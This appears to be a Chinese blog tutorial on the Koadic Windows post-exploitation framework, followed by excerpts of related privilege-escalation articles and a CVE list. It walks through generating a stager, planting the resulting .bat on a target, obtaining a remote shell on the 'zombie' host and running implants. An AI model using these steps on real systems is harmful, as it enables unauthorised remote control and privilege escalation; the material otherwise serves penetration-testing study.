windows提权辅助工具koadic

项目地址:https://github.com/zerosum0x0/koadic

┌─[[email protected]]─[/sch01ar]
└──? #git clone https://github.com/zerosum0x0/koadic

下载后打开并安装所需的包

┌─[[email protected]]─[/sch01ar/koadic]
└──? #pip install -r requirements.txt

安装完成后启动程序

┌─[[email protected]]─[/sch01ar/koadic]
└──? #./koadic

输入use和空格然后连按两下Tab键查看模块

stager开头的模块是用来反弹主机的,implant开头的模块是用来对反弹的主机进行操作

选择stager/js/disk进行测试

(koadic: sta/js/mshta)# use stager/js/disk

查看配置信息

(koadic: sta/js/disk)# info

设置lhost

(koadic: sta/js/disk)# set LHOST 192.168.220.132

然后run

(koadic: sta/js/disk)# run

然后把[>]后的东西写到一个bat文件里,放到目标主机打开

注:stager开头的模块都是一样的操作

得到目标主机的反弹

查看僵尸主机列表

(koadic: sta/js/disk)# zombies

注:此目标主机的ID为0

执行cmd命令,0为主机的ID

(koadic: sta/js/disk)# cmdshell 0
[koadic: ZOMBIE 0 (192.168.220.129) - cmd.exe]> whoami

该上implant模块了

(koadic: sta/js/disk)# use implant/fun/voice

这个MESSAGE随便你设置,然后run

将会在目标主机朗读MESSAGE的内容

时间: 2024-10-08 01:12:07

windows提权辅助工具koadic的相关文章

后渗透提权辅助工具BeRoot详解

0x00 工具介绍 前言 BeRoot是一个后期开发工具,用于检查常见的Windows的配置错误,以方便找到提高我们提权的方法.其二进制编译地址为: https://github.com/AlessandroZ/BeRoot/releases 它将作为后开发模块被添加到pupy(Pupy是一个开源,跨平台(Windows,Linux,OSX,Android),多功能RAT远程管理工具和后开发工具,主要用python编写)项目中(因此它将在内存中执行,而不会在硬盘中执行). 需要注意的是,这款工具

linux提权辅助工具(四):LinEnum.sh

来自:https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh #!/bin/bash #A script to enumerate local information from a Linux host version="version 0.94" #@rebootuser #help function usage () { echo -e "\n\e[00;31m#############

2017-2018-2 20155315《网络对抗技术》免考五:Windows提权

原理 使用metasploit使目标机成功回连之后,要进一步攻击就需要提升操作权限.对于版本较低的Windows系统,在回连的时候使用getsystem提权是可以成功的,但是对于更高的系统操作就会被拒绝.为了获得受害机器的完全权限,需要绕过限制,获取本来没有的一些权限,这些权限可以用来删除文件,查看私有信息,或者安装特殊程序,比如病毒. Metasploit有很多种后渗透方法,可以用于对目标机器的权限绕过,最终获取到系统权限. UAC 用户帐户控制(User Account Control, U

windows提权方法总结

windwos提权方法分为两大块: 一.系统漏洞 二.第三方软件漏洞 系统信息泄露和配置不当都可能导致系统被入侵,下面总结是一些常用的windows提权方式. 1,SER-TU提权(通常是利用SERFTP服务器管理工具,首先要在安装目录下找到INI配置文件,必须具备可写入的权限) 2,RADMIN提权(大家并不陌生,我们在扫描4899空口令后,同样需要他来连接) 3,PCANYWHRER提权(也是远程客户端软件,下载安装目录的CIF文件进行破解) 4,SAM提权(SAM系统帐户,通常需要下载临时

[转帖]「白帽黑客成长记」Windows提权基本原理(上)

https://www.cnblogs.com/ichunqiu/p/10949592.html 我们通常认为配置得当的Windows是安全的,事实真的是这样吗?今天让我们跟随本文作者一起深入了解Windows操作系统的黑暗角落,看看是否能得到SYSTEM权限. 作者将使用不同版本的Windows来强调任何可能存在的命令行差异,请牢记因为不同的操作系统和版本差异会在命令行中显现,作者试图构造本教程,以便它适用于Windows提权的最普遍的方式. 注:文章篇幅较长,阅读用时约10分钟. 必要文档补

windows 提权 cve-2018-8897

windows 提权 cve-2018-8897 影响范围:基本上是全版本 具体影响范围看详情:https://portal.msrc.microsoft.co … isory/CVE-2018-8897 http://www.o2oxy.cn/wp-content/uploads/2018/06/cve-2018-8897.rar 原文地址:https://www.cnblogs.com/liang2580/p/9157887.html

windows提权之ftp提权

windows提权之ftp提权 0,起因,由于前几天拿了一个菠菜站的webshell,但是只有iis权限,执行无法创建用户等操作,更无法对整个服务器进行控制了,于是此时便需要提权了,对于一个刚刚入门的小白来说,此刻真正意识到了提权的重要性,于是便开始学习提取相关知识,以拿下该菠菜的站点. 提权前的准备工作 1,通常来说,不同的脚本所处的权限是不一样的.这就意味着,如果该站点支持权限更高的脚本,我们可以上传该权限更高的脚本的大马,进而拿到更高的权限. asp/php 通常为匿名权限(网络服务权限)

windows提权

PsExec at Process_Injector sc psexec 当前用户是jh提权之后 *at命令提权(适用于xp,2003) at 15:05 /interact cmd sc 创建服务(打开cmd命令窗口的服务) sc Create systemcmd binPath= "cmd /K start" type= own type= interact 启动服务刚才创建的服务 sc start systemcmd process_injector 列出当前的所有进程 pinj

Windows提权列表

漏洞列表 #Security Bulletin #KB #Description #Operating System CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability] (windows 10/8.1/7/2016/2010/2008) MS17-010 [KB4013389] [Windows Kernel Mode Drivers] (windows 7/2008/2003/XP) MS16-135 [KB3199